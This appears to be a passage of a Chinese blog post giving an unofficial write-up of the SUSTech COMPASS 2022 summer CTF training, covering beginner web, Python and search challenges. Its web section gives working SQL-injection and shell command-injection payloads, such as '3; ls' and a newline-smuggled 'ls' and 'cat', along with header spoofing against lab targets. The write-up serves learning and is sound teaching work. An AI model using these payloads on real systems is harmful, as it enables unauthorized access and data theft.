<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><title> Write-up of COMPASS 2022 Summer Training · Monad's Blog</title><meta name="description" content="Write-up of COMPASS 2022 Summer Training - Monad"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="icon" href="/images/favicon.png"><link rel="preload" href="/css/apollo.css" as="style" onload="this.onload=null;this.rel='stylesheet'"><noscript><link rel="stylesheet" href="/css/apollo.css"></noscript><link rel="preload" href="/katexify/katex.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"><noscript><link rel="stylesheet" href="/katexify/katex.min.css"></noscript><link rel="preload" href="/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"><noscript><link rel="stylesheet" href="/css/all.min.css"></noscript><link rel="search" type="application/opensearchdescription+xml" href="https://blog.monadx.com/atom.xml" title="Monad's Blog"><meta name="generator" content="Hexo 6.2.0"><link rel="alternate" href="/atom.xml" title="Monad's Blog" type="application/atom+xml">
</head><body><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PP344KH" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><div class="wrap"><header><a class="logo-link" href="/"><img src="/images/favicon.png" alt="logo"></a><ul class="nav nav-list"><li class="nav-list-item"><a class="nav-list-link" href="/" target="_self">BLOG</a></li><li class="nav-list-item"><a class="nav-list-link" href="/archives/" target="_self">ARCHIVE</a></li><li class="nav-list-item"><a class="nav-list-link" href="https://github.com/YanWQ-monad" target="_blank" rel="noopener">GITHUB</a></li><li class="nav-list-item"><a class="nav-list-link" href="/about" target="_self">ABOUT</a></li></ul></header><main class="container"><div class="post"><article class="post-block" itemscope itemtype="http://schema.org/Article"><h1 class="post-title" itemprop="name">Write-up of COMPASS 2022 Summer Training</h1><div class="hidden" itemprop="author" itemscope itemtype="http://schema.org/Person"><span itemprop="name">Monad</span></div><div class="hidden" itemprop="dateModified" content="2023-07-02">2023年7月2日</div><div class="post-info" itemprop="datePublished" content="2022-07-11">2022年7月11日</div><div class="post-content" itemprop="articleBody"><p><del>SUSTech CTF 课堂开课啦！孩子机器老被打，多半是寄了，用 COMPASS 牌 CTF 暑期训练课程，练攻击，直接给他打回去，妈妈一定要记住哦！</del></p>
<p>咳咳，总之这篇就是 SUSTech COMPASS 暑期 CTF 训练的题解（非官方）。</p>
<span id="more"></span>
<h1 id="目录">目录</h1>
<ul>
<li><a href="#week-1">Week 1</a>
<ul>
<li><a href="#practice-flag">Practice Flag</a></li>
<li><a href="#where-can-my-robot-go">Where Can My Robot Go?</a></li>
<li><a href="#wikipedia">Wikipedia</a></li>
<li><a href="#进制十六参上">进制十六——参上</a></li>
<li><a href="#猫咪问答-pro-max">猫咪问答 Pro Max</a></li>
<li><a href="#旅行照片">旅行照片</a></li>
<li><a href="#卖瓜">卖瓜</a></li>
<li><a href="#fixme1.py">fixme1.py</a></li>
<li><a href="#fixme2.py">fixme2.py</a></li>
<li><a href="#pw-crack-1">PW Crack 1</a></li>
<li><a href="#pw-crack-2">PW Crack 2</a></li>
<li><a href="#pw-crack-3">PW Crack 3</a></li>
<li><a href="#pw-crack-4">PW Crack 4</a></li>
<li><a href="#pw-crack-5">PW Crack 5</a></li>
<li><a href="#time-traveller">Time Traveller</a></li>
<li><a href="#command-challenge">Command Challenge</a></li>
</ul></li>
<li><a href="#week-2">Week 2</a>
<ul>
<li><a href="#web-签到题">web 签到题</a></li>
<li><a href="#basic-injection">Basic Injection</a></li>
<li><a href="#post-practice">POST Practice</a></li>
<li><a href="#dont-bump-your-header">Don't Bump Your Head(er)</a></li>
<li><a href="#calculat3-m3">Calculat3 M3</a></li>
<li><a href="#php-audit">php audit</a></li>
<li><a href="#execute">Execute?</a></li>
<li><a href="#why-sqli">why sqli?</a></li>
</ul></li>
<li><a href="#week-3">Week 3</a>
<ul>
<li><a href="#whats-my-ip-address">What's my IP address?</a></li>
<li><a href="#flag-助力大红包">FLAG 助力大红包</a></li>
<li><a href="#sqli">SQLI</a></li>
<li><a href="#simple-sqli">Simple SQLI</a></li>
<li><a href="#not-easy-sql-injection">Not easy SQL injection</a></li>
<li><a href="#reverse-shell-included">Reverse shell included</a></li>
<li><a href="#php-pop">PHP POP</a></li>
</ul></li>
<li><a href="#week-4">Week 4</a>
<ul>
<li><a href="#information">Information</a></li>
<li><a href="#matryoshka-doll">Matryoshka doll</a></li>
<li><a href="#like1000">like1000</a></li>
<li><a href="#upper-lower-case">upper-lower case</a></li>
<li><a href="#whitepages">WhitePages</a></li>
<li><a href="#sleuthkit-apprentice">Sleuthkit Apprentice</a></li>
<li><a href="#m00nwalk">m00nwalk</a></li>
<li><a href="#weak-password">weak password</a></li>
<li><a href="#简单的隐写">简单的隐写</a></li>
</ul></li>
</ul>
<h1 id="week-1">Week 1</h1>
<h2 id="practice-flag">Practice Flag</h2>
<p>直接把 "Try inputting the flag:" 后面的 flag 复制粘贴就可以了。</p>
<h2 id="where-can-my-robot-go">Where Can My Robot Go?</h2>
<p>robots.txt 是放在网站根目录下的一个文件，用来告诉搜索引擎或者爬虫哪些内容能访问，哪些不能（不过这不是强制的）。详情可以去 Google "robots.txt"。</p>
<p>然后这道题的话，我们就访问一下这个 robots.txt 文件（<a target="_blank" rel="noopener" href="https://ctflearn.com/robots.txt">https://ctflearn.com/robots.txt</a>），然后可以找到：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">User-agent: *</span><br><span class="line">Disallow: /70r3hnanldfspufdsoifnlds.html</span><br></pre></td></tr></tbody></table></figure>
<p>这里有一个非常奇怪的网页，<del>虽然写了 Disallow</del>，我们就点进去看一下（<a target="_blank" rel="noopener" href="https://ctflearn.com/70r3hnanldfspufdsoifnlds.html">https://ctflearn.com/70r3hnanldfspufdsoifnlds.html</a>），于是就发现了 flag。</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CTFlearn{r0b0ts_4r3_th3_futur3}</span><br></pre></td></tr></tbody></table></figure>
<h2 id="wikipedia">Wikipedia</h2>
<p>说到 Wikipedia，一般指的是英文的维基百科，即 <a target="_blank" rel="noopener" href="https://en.wikipedia.org">https://en.wikipedia.org</a>。</p>
<p>然后 IP 的话，一般会出现在 Wikipedia 的修改历史里面。因为 Wikipedia 是允许非注册用户对页面进行修改的，这时候就会用 IP 来代替用户名。</p>
<p>现在的问题就变成了如何在 Wikipedia 找到这个 IP 的修改记录，毕竟现在也不知道怎么查。我们就可以随便找一个页面（比如主页），点右上角的 View history，翻一下页，找到一个用 IP 的修改记录；并且发现，点击 IP，弹出的页面就是这个 IP 的所有修改记录。</p>
<p>然后不难发现，此时的 URL 是 <code>https://en.wikipedia.org/wiki/Special:Contributions/&lt;IP&gt;</code> 的形式，把 <code>&lt;IP&gt;</code> 换成我们想查的 IP，即 <a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/Special:Contributions/128.125.52.138">https://en.wikipedia.org/wiki/Special:Contributions/128.125.52.138</a>。</p>
<p>点开这个链接，发现只有一条修改记录，点击 "diff"（即查看这次修改修改了啥），发现了这么个玩意：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Wikipedia_Flag.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Wikipedia_Flag.png" loading="lazy"></a></p>
<p>然后这玩意就是 flag 了。</p>
<h2 id="进制十六参上">进制十六——参上</h2>
<p>见 Hackergame 2021 题解的<a href="/2021/10/31/Hackergame-2021/#进制十六参上">进制十六——参上</a>。</p>
<h2 id="猫咪问答-pro-max">猫咪问答 Pro Max</h2>
<p>见 Hackergame 2021 题解的<a href="/2021/10/31/Hackergame-2021/#猫咪问答-pro-max">猫咪问答 Pro Max</a>。</p>
<h2 id="旅行照片">旅行照片</h2>
<p>见 Hackergame 2021 题解的<a href="/2021/10/31/Hackergame-2021/#旅行照片">旅行照片</a>。</p>
<h2 id="卖瓜">卖瓜</h2>
<p>见 Hackergame 2021 题解的<a href="/2021/10/31/Hackergame-2021/#卖瓜">卖瓜</a>。</p>
<h2 id="fixme1.py">fixme1.py</h2>
<p>把文件下载下来，先跑一下（不跑怎么知道它错在了哪里呢）。然后 Python 就报错：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ python3 fixme1.py</span><br><span class="line">  File "~/Downloads/fixme1.py", line 20</span><br><span class="line">    print('That is correct! Here\'s your flag: ' + flag)</span><br><span class="line">IndentationError: unexpected indent</span><br></pre></td></tr></tbody></table></figure>
<p>就是这个地方缩进不对：</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">flag = str_xor(flag_enc, <span class="string">'enkidu'</span>)</span><br><span class="line">  <span class="built_in">print</span>(<span class="string">'That is correct! Here\'s your flag: '</span> + flag)</span><br></pre></td></tr></tbody></table></figure>
<p>按照脚本的意思（毕竟这附近也没有 if 什么的控制语句嘛），所以把 <code>print</code> 前面那俩空格删了就可以了。然后重新跑一下就能出 flag 了。</p>
<h2 id="fixme2.py">fixme2.py</h2>
<p><del>按照惯例</del>，先跑一下：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ python3 fixme2.py</span><br><span class="line">  File "/Users/monad/Downloads/fixme2.py", line 22</span><br><span class="line">    if flag = "":</span><br><span class="line">            ^</span><br><span class="line">SyntaxError: invalid syntax</span><br></pre></td></tr></tbody></table></figure>
<p><del>经典用单个等于判断相等</del>，把 <code>=</code> 改成 <code>==</code> 就 ok 了。</p>
<h2 id="pw-crack-1">PW Crack 1</h2>
<p><del>按照惯例</del>，先跑一下，然后发现要输入密码。然后打开源代码看一下，发现了这么个玩意：</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">user_pw = <span class="built_in">input</span>(<span class="string">"Please enter correct password for flag: "</span>)</span><br><span class="line"><span class="keyword">if</span>( user_pw == <span class="string">"1e1a"</span>):</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">"Welcome back... your flag, user:"</span>)</span><br></pre></td></tr></tbody></table></figure>
<p>所以 <code>1e1a</code> 就肯定是密码了，于是输入进去，就出 flag 了。</p>
<h2 id="pw-crack-2">PW Crack 2</h2>
<p>这道题跟上一题差不多：</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">user_pw = <span class="built_in">input</span>(<span class="string">"Please enter correct password for flag: "</span>)</span><br><span class="line"><span class="keyword">if</span>( user_pw == <span class="built_in">chr</span>(<span class="number">0x33</span>) + <span class="built_in">chr</span>(<span class="number">0x39</span>) + <span class="built_in">chr</span>(<span class="number">0x63</span>) + <span class="built_in">chr</span>(<span class="number">0x65</span>) ):</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">"Welcome back... your flag, user:"</span>)</span><br></pre></td></tr></tbody></table></figure>
<p>你可以把 <code>chr(0x33) + chr(0x39) + chr(0x63) + chr(0x65)</code> 喂给 Python 看看是多少（然后就跟上一题一样了）。如果想偷懒的话，可以直接改成：</p>
<figure class="highlight plaintext"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">user_pw = chr(0x33) + chr(0x39) + chr(0x63) + chr(0x65)</span><br><span class="line">if( user_pw == chr(0x33) + chr(0x39) + chr(0x63) + chr(0x65) ):</span><br><span class="line">    print("Welcome back... your flag, user:")</span><br></pre></td></tr></tbody></table></figure>
<p>跑一下就能出 flag。</p>
<h2 id="pw-crack-3">PW Crack 3</h2>
<p>朴素方法：把 <code>pos_pw_list</code> 里面的每个密码都试一次，看看哪个对。</p>
<p>更优的方法：看下一题。</p>
<h2 id="pw-crack-4">PW Crack 4</h2>
<p>由于这道题的可能的密码的数量非常多，高达 100 个，手动试就太慢了（事实上在上一题试 7 个我都已经不想试了）。</p>
<p>于是我们就可以手动魔改代码，用程序来帮我们试。其实就是把下面的部分改成：</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">level_4_pw_check</span>(<span class="params">password</span>):  <span class="comment"># 通过参数传入密码</span></span><br><span class="line">    user_pw = password</span><br><span class="line">    user_pw_hash = hash_pw(user_pw)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> user_pw_hash == correct_pw_hash:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">"Welcome back... your flag, user:"</span>)</span><br><span class="line">        decryption = str_xor(flag_enc.decode(), user_pw)</span><br><span class="line">        <span class="built_in">print</span>(decryption)</span><br><span class="line">        <span class="keyword">return</span></span><br><span class="line"></span><br><span class="line">pos_pw_list = ...  <span class="comment"># 省略</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 遍历所有可能的密码</span></span><br><span class="line"><span class="keyword">for</span> password <span class="keyword">in</span> pos_pw_list:</span><br><span class="line">    level_4_pw_check(password)</span><br></pre></td></tr></tbody></table></figure>
<p>然后跑一下，就 ok 了。</p>
<h2 id="pw-crack-5">PW Crack 5</h2>
<p>这道题跟上一题的相似度，比上一题跟上上一题的还高，只是这题的密码表存到了另外一个文件里，并且是真的多。</p>
<p>跟上一题类似，把代码魔改成：</p>
<figure class="highlight python"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">'dictionary.txt'</span>) <span class="keyword">as</span> f:</span><br><span class="line">    <span class="comment"># 可以用 for in 的方法来遍历文件的每一行</span></span><br><span class="line">    <span class="keyword">for</span> password <span class="keyword">in</span> f:</span><br><span class="line">        <span class="comment"># 这里用 .strip() 去除每一行末尾的空格</span></span><br><span class="line">        level_5_pw_check(password.strip())</span><br></pre></td></tr></tbody></table></figure>
<p>然后跑一跑就能出 flag。</p>
<h2 id="time-traveller">Time Traveller</h2>
<p>这道题大意就是让我们在 1996 年 12 月 31 日的 NASA（<del>由崎&nbsp;<ruby>星<rp>(</rp><rt>ナ</rt><rp>)</rp>空<rp>(</rp><rt>サ</rt><rp>)</rp></ruby></del>）的官网上面找到一个电子邮件。</p>
<p>与互联网上的旧页面相关的，一律找 <a target="_blank" rel="noopener" href="https://web.archive.org">Internet Archive</a>。</p>
<p>首先不难发现，NASA 的官网是 https://www.nasa.gov，把它扔到上面的 Internet Archive 网站里面，找到 1996 年 12 月 31 日的页面：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/NASA_Dec_31_1996.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/NASA_Dec_31_1996.png" loading="lazy"></a></p>
<p>不难发现邮箱 <code>today@nasa.gov</code>。</p>
<h2 id="command-challenge">Command Challenge</h2>
<p><del>朴素方法：一道一道题做下去，就能拿到 flag，顺便还能学到不少 Linux bash 的技巧。</del></p>
<p>首先先过个一两题，然后打开 F12，发现通过的题目是存在本地的：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Command_Challenge_storage.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Command_Challenge_storage.png" loading="lazy"></a></p>
<p>于是就可以想着去修改它，来“快速过题”。于是现在的问题就是，如何找到题目的列表，然后填上去。</p>
<p>用 <code>current_working_directory</code> 在前端的文件里面搜索，然后就可以找到一个很像配置文件的配置文件：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Command_Challenge_configuration.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Command_Challenge_configuration.png" loading="lazy"></a></p>
<p>这里的话，其实每个 <code>slug</code> 后面跟的字符串，就是题目的名字。</p>
<blockquote>
<p>有同学说用 <code>ls ..</code>（列出上级目录的文件）也可以得到题目的列表。</p>
</blockquote>
<p>我们把它们收集起来，然后扔到上面的 <code>correct_answers</code>，再刷新一下页面：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Command_Challenge_solved.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Command_Challenge_solved.png" loading="lazy"></a></p>
<p>就发现前面多了一行 <code>🎉.....🎉</code> 的庆祝语，连着两个 emoji 复制，粘贴，就可以过了。</p>
<h1 id="week-2">Week 2</h1>
<h2 id="web-签到题">web 签到题</h2>
<p>打开网站，发现啥都没有（指可交互元素），然后查看 HTML 源代码，发现：</p>
<figure class="highlight html"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">where is flag?</span><br><span class="line"></span><br><span class="line"><span class="comment">&lt;!-- </span></span><br><span class="line"><span class="comment">Y3Rmc2hvd3s0YmY1M2U3MC02YzM2LTRiYjEtOWNhMS1jOTc5OGQ5NWY0MGZ9--&gt;</span></span><br></pre></td></tr></tbody></table></figure>
<p>然后发现一串神秘字符串。用一种常见的字符串编码方式（即 base64）解码，就可以得到 flag。</p>
<h2 id="basic-injection">Basic Injection</h2>
<p>构造 <code>' or 1=1; -- a</code>，让最终的查询变成 <code>SELECT * FROM webfour.webfour where name = '' or 1=1; -- a'</code>（实际上等价于 <code>SELECT * FROM webfour.webfour</code>），就可以查询所有记录了。</p>
<p>然后发现查询的结果里面就有 flag。</p>
<blockquote>
<p>值得注意的是，<code>--</code> 使注释生效的一个条件是，<code>--</code> 后面必须要有一个空格。如果要避免两端空格被吞掉的话，可以在后面补一个字符。</p>
</blockquote>
<h2 id="post-practice">POST Practice</h2>
<p>惯例，先直接访问一下。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/POST_Practice_1.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/POST_Practice_1.png" loading="lazy"></a></p>
<p>唔……它告诉说需要 POST 某些东西才可以。不过内容都在注释里面写着了。</p>
<p>我们就直接 POST 给服务器就好了。</p>
<blockquote>
<p>发送 POST 请求可以用 Postman 等图形化应用，也可以手动调用 curl。</p>
</blockquote>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/POST_Practice_2.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/POST_Practice_2.png" loading="lazy"></a></p>
<p>于是我们就摸到了 flag。</p>
<h2 id="dont-bump-your-header">Don't Bump Your Head(er)</h2>
<p>按照惯例，先访问一下网站：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Bump_Header_1.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Bump_Header_1.png" loading="lazy"></a></p>
<p>虽然没有明说，但是可以试试把 <code>Sup3rS3cr3tAg3nt</code> 作为 <code>User-Agent</code> 发送给服务器。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Bump_Header_2.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Bump_Header_2.png" loading="lazy"></a></p>
<p>这时候，它告诉我们说，你不是来自 <code>awesomesauce.com</code> 这个服务器。</p>
<p>HTTP headers 里面有一个叫 <code>Referer</code> 的东西，可以向服务器表示我是从哪个网页跳转过来的，这一条也可以瞎搞，改成服务器想要的就行了。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Bump_Header_3.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Bump_Header_3.png" loading="lazy"></a></p>
<p>然后就拿到了 flag。</p>
<h2 id="calculat3-m3">Calculat3 M3</h2>
<p>先随便输入一个算式，然后发个请求，看看它是怎么算的。可以发现，它发了一个 POST 请求，内容是 <code>express=3+3</code>（虽然其实还有空格，不过问题不大）。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Calculat3_M3_1.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Calculat3_M3_1.png" loading="lazy"></a></p>
<p>然后这里怎么注入呢，比如说，它有可能是执行命令 <code>calc 3+3</code>，然后把它的输出返回。这时候，如果网页的防护不强，我们就可以在 <code>3+3</code> 的后面再塞点东西，让他执行其它命令。</p>
<p>比如说，如果我们给它一个 <code>3+3; ls</code>，拼起来之后就是 <code>calc 3+3; ls</code>，这样的话，除了执行 <code>calc 3+3</code> 之外，它还会执行 <code>ls</code>（列出当前目录下的文件）。把 <code>ls</code> 换成其它命令，就可以随便乱搞了。</p>
<p>于是这里我们先给它发一个 <code>3; ls</code> 看看：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Calculat3_M3_2.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Calculat3_M3_2.png" loading="lazy"></a></p>
<p>运气不错，拿到 flag 了。</p>
<blockquote>
<p><del>我也不知道为什么 <code>3 + 3; ls</code> 不行，只能说服务器十分的玄学，甚至除了 <code>ls</code> 之外的命令都用不了。可能它只是特判了一下一些特殊的模式，然后就给你返回了，实际上并没有真正的执行命令。</del></p>
</blockquote>
<h2 id="php-audit">php audit</h2>
<p>按照惯例，先访问一下，获得了 PHP 源代码：</p>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">include</span> <span class="string">"flag1.php"</span>;</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(__file__);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">'args'</span>])){</span><br><span class="line">    <span class="variable">$args</span> = <span class="variable">$_GET</span>[<span class="string">'args'</span>];</span><br><span class="line">    <span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">"/^\w+$/"</span>,<span class="variable">$args</span>)){</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"args error!"</span>);</span><br><span class="line">    }</span><br><span class="line">    <span class="keyword">eval</span>(<span class="string">"var_dump($<span class="subst">$args</span>);"</span>);</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure>
<p>虽然我不怎么会 PHP，但是能够感觉得出来，你在 <code>args</code> 传入什么，它就会把哪个变量打印出来。比如说如果传入参数 <code>args=$_GET</code>，它就会把 <code>_GET</code> 里面的东西打印出来。</p>
<p>然后由于这里限制了 <code>args</code> 只能是大小写字母、数字、下划线，所以执行恶意代码是几乎不可能的了。</p>
<p>所以打印变量的话，我们可以考虑 PHP 的一些特殊的、内置的变量（好像在官方文档里面叫做<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/reserved.variables.php">预定义变量</a>）。翻一下文档，发现一个不错的 <code>$GLOBALS</code>，可以打印出全局的全部变量。</p>
<p>废话少说，直接试试：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/PHP_audit.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/PHP_audit.png" loading="lazy"></a></p>
<p>于是我们就获得了 flag。</p>
<blockquote>
<p>源代码里面的 <code>$$args</code> 是什么意思，可以看官方文档的 <a target="_blank" rel="noopener" href="https://www.php.net/manual/en/language.variables.variable.php">Variable variables</a>。</p>
</blockquote>
<h2 id="execute">Execute?</h2>
<p>开始先和 <a href="#calculat3-m3">Calculat3 M3</a> 差不多，先随便输入一个 IP 看看它是怎么发送请求的。然后发现它是给 <code>http://103.102.44.218:10016/exec.php?ip=&lt;ip&gt;</code> 发送了请求（其中 <code>&lt;ip&gt;</code> 即指某个具体 IP）。</p>
<p>然后 F12 看一下，发现可以访问 <code>/exec.php?view_source</code> 来获取源代码，可以看到它过滤了包括但不限于 <code>&amp;</code>, <code>|</code>, <code>`</code> 字符。</p>
<blockquote>
<p>其实说实话，我做这道题的时候没发现这个源代码，<del>不过还是做出来了</del>，还是顺便讲讲吧。</p>
<p>瞎试一下，发现传 <code>"127.0.0.1"</code>（带双引号），它也可以正常工作。不过这并不能说明它没过滤双引号（虽然事实上确实没有）。</p>
<p>然后继续瞎试，在双引号里面带个空格试试，传个 <code>"127.0.0.1 abc"</code>，发现它还是正常的：</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Execute_try_space.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Execute_try_space.png" loading="lazy"></a></p>
<p>于是发现 <code>ping</code> 指会取空格前面的 IP，后面的是不管的。不过显示的时候还是会全部显示出来。于是就可以用这个方法试试哪些字符能用，就是瞎滚键盘，看看它返回了哪些字符，就说明哪些没被过滤。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Execute_filter_table.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Execute_filter_table.png" loading="lazy"></a></p>
<p>然后就曲线救国地也把过滤的字符集也挖了出来。</p>
</blockquote>
<p>由于它过滤了 <code>&amp;</code>, <code>|</code>, <code>`</code> 等字符，一般的注入方式没办法使用（指 <code>&amp;&amp; ls</code>, <code>`ls`</code>, <code>${ls}</code> 等）。</p>
<p>不过还有一个老旧的方法可以试试，就是用换行。于是发一个请求 <code>127.0.0.1\nls</code>（在这里，<code>\n</code> 表示换行）。Surprise, it works.</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Execute_ls.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Execute_ls.png" loading="lazy"></a></p>
<p>然后发现 <code>flag.php</code> 后，<code>cat</code> 一下就能拿到它的内容，里面就有 flag。</p>
<p><a href="/images/2022-7-11-COMPASS-Summer-Writeup/Execute_solved.png" class="glightbox"><img src="/images/2022-7-11-COMPASS-Summer-Writeup/Execute_solved.png" loading="lazy"></a></p>
<h2 id="why-sqli">why sqli?</h2>
<p>先请求一下，拿到代码。（下面的代码简化了一下，保留了核心部分。）</p>
<figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require</span> <span class="string">'db.inc.php'</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">clean</span>(<span class="params"><span class="variable">$str</span></span>) </span>{</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">get_magic_quotes_gpc</span>()) {</span><br><span class="line">        <span class="variable">$str</span> = <span class="title function_ invoke__">stripslashes</span>(<span class="variable">$str</span>);</span><br><span class="line">    }</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">htmlentities</span>(<span class="variable">$str</span>, ENT_QUOTES);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$username</span> = @<span class="title function_ invoke__">clean</span>((<span class="keyword">string</span>)<span class="variable">$_GET</span>[<span class="string">'username'</span>]);</span><br><span class="line"><span class="variable">$password</span> = @<span class="title function_ invoke__">clean</span>((<span class="keyword">string</span>)<span class="variable">$_GET</span>[<span class="string">'password'</span>]);</span><br><span class="line"></span><br><span class="line"><span class="variable">$query</span> = <span class="string">'SELECT * FROM users WHERE name=\''</span>.<span class="variable">$username</span>.<span class="string">'\' AND pass=\''</span>.<span class="variable">$password</span>.<span class="string">'\';'</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$result</span> = <span class="title function_ invoke__">mysql_query</span>(<span class="variable">$query</span>);</span><br><span class="line"><span class="keyword">if</span> (!<span class="variable">$result</span> || <span class="title function_ invoke__">mysql_num_rows</span>(<span class="variable">$result</span>) &lt; <span class="number">1</span>) {</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">'Invalid password!'</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="variable">$row</span> = <span class="title function_ invoke__">mysql_fetch_assoc</span>(<span class="variable">$result</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"Hello "</span>.<span class="variable">$row</span>[<span class="string">'name'</span>].<span class="string">"&lt;/br&gt;Your password is:"</span>.<span class="variable">$row</span>[<span class="string">'pass'</span>].<span class="string">"&lt;/br&gt;"</span>;</span><br></pre></td></tr></tbody></table></figure>
